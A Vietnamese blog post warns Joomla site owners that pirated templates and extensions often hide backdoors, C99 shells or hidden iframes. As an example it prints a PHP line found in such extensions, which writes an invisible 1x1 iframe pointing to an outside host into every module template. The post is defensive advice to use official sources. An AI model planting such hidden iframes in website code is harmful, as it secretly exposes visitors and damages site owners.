Nguy cơ dính backdoor từ template và extension lậu

[LeeHuy]

Joomla là mã nguồn mở miễn phí. Nhưng để có một website đẹp và chuyên nghiệp từ mã nguồn Joomla, thì cần phải có template và các extension chuyên nghiệp hỗ trợ. Những template và extension này thì lại phải trả tiền. Đây chính là lý do khiến rất nhiều bạn sử dụng các template và extension Null được chia sẻ trên mạng.

Các template chuyên nghiệp, đẹp được chia sẻ trên các diễn đàn hầu hết của Joomlart, Rockettheme, TemplatePlazza, Shape5 và Gavick. Để mua bản quyền các template này, các bạn thường phải trả 50USD/template đơn hay các mức từ vài trăm USD/năm cho quyền thành viên để được download thoải mái. Với các component, module, plugin hay mambot thuộc dạng commercial (thương mại) cũng vậy, giá cả phải trả cũng từ vài chục USD đến hàng trăm USD.

Đây chính là lý do để các bạn tặc lưỡi: Vào google, gõ 1 từ khóa, lôi về một đống template và extension chia sẻ FREE 100%.

Thực tế cho thấy, rất nhiều template và extension được chia sẻ này có chứa backdoor hoặc mã độc. Nặng thì là một vài con Shell C99, nhẹ là vài dòng link back hoặc Iframe trỏ về một trang nào đó có chủ đích.

Ví dụ, hiện có nhiều trang web cài extension Null đang bị dính mã Iframe này:

PHP Code: 

<?php endforeach; 
echo "<iframe src=\"http://hosttracker.net/?click=29341062\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
?>

Khi bạn cho web chạy, backdoor sẽ nhảy vào tất cả các module, chèn đoạn mã trên vào tất cả các file default.php trong thư mục tmpl.

Với backdoor, nhẹ thì bạn chỉ bị mất chút thông tin, nặngweb bạn có thể bị đánh sập hoặc bị phá hoại rất lâu dài. Ít nhất, thì những iframe như trên cũng sẽ khiến google chú ý và sẽ triệt hạ kết quả tìm kiếm trên website của bạn.

Nói tóm lại, để đảm bản an toàn cho website, bạn không nên dùng các template và extension chia sẻ vô tội vạ trên mạng. Tất cả template, mã nguồn và extension đều phải được tải về từ chính nhà sản xuất ra chúng hoặc ít nhất là từ joomlacode.org.